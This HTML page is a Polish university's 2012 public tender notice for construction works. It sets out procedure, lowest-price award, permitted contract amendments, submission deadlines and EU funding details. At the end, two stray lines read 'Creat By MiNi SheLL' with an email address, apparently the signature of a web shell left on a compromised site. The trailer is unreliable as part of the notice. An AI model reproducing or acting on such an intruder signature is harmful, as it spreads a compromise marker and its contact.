<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy
2.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian postanowień zawartej umowy:
2.1.	Zmiana terminu realizacji przedmiotu zamówienia z powodu:
a)	warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych temperatury powietrza poniżej 0 st. C, wiatr uniemożliwiający prace maszyn budowlanych, gwałtowne opady deszczu(oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi. Fakt ten musi zostać zgłoszony Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru.
b)	koniecznością wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych wpływających na termin wykonania robót objętych niniejszą umową podstawową, 
c)	wstrzymania robót  przez właściwe organy administracji publicznej na podstawie przepisów Prawa budowlanego,
d)	niedotrzymania przez Zamawiającego warunków umowy: opóźnienia, utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
e)	koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, 
f)	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia,
g)	następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień,
2.1.1	Zaistnienie przeszkód w wykonywaniu robót muszą być potwierdzone wpisem do dziennika budowy i udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy i inspektora nadzoru.
2.1.2	Termin Wykonania przedmiotu zamówienia ulega przesunięciu o okres wynikający z przerw lub opóźnień rozpoczęcia prac.
2.1.3	W sytuacji zmiany terminu wykonania zamówienia na Wykonawcy spoczywa obowiązek przedłużenia okresu obowiązywania zabezpieczenia należytego wykonania przedmiotu umowy. Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy. 
2.2.	 Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej Wykonawcy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to, przykładowo, okoliczności: 
a)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;
b)	powodujące poprawienie parametrów technicznych;
c)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
2.2.1	Zmiany, o których mowa w  pkt 2.2  niniejszego paragrafu muszą być każdorazowo  zatwierdzone przez Zamawiającego w porozumieniu z projektantem.
2.2.2	Zmiany, o których mowa w  pkt 2.2  niniejszego paragrafu nie spowodują zmiany ceny wykonania przedmiotu umowy, o której mowa w § 5 ust. 1 niniejszej umowy.
2.3.	Przewiduje się możliwość rezygnacji z wykonania pewnych robót przewidzianych w dokumentacji projektowej (roboty zaniechane) w sytuacji, gdy ich wykonanie będzie zbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy określonego  w § 1 niniejszej umowy. Sposób wyliczenia wartości tych robót określa § 5 ust. 10. 
2.4.	Przewiduje się możliwość zmiany osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, niewywiązywania się  z obowiązków wynikających z umowy, pod warunkiem, że osoby zaproponowane będą posiadały  kwalifikacje i uprawnienia   zgodne  z wymogiem SIWZ .
2.5.	Przewiduje się możliwość zmiany podwykonawcy, jeżeli podwykonawca nie został zaakceptowany przez Zamawiającego, nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą 
2.6.	Przewiduje się możliwość  zmiany umowy gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 08:30, miejsce: w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013
Priorytet 5. Krakowski Obszar Metropolitarny Działanie 5.1. Krakowski Obszar Metropolitarny jako ważny węzeł europejskiej przestrzeni badawczej dla projektu Małopolskie Laboratorium Budownictwa Energooszczędnego Umowa NR XVI/122/PR/12  zawarta pomiędzy Zarządem Województwa Małopolskiego a Politechniką Krakowską w dniu 23.08.2012r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com